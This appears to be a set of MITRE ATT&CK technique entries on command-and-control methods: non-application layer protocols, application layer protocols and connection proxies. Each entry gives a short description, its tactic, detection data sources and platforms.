Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre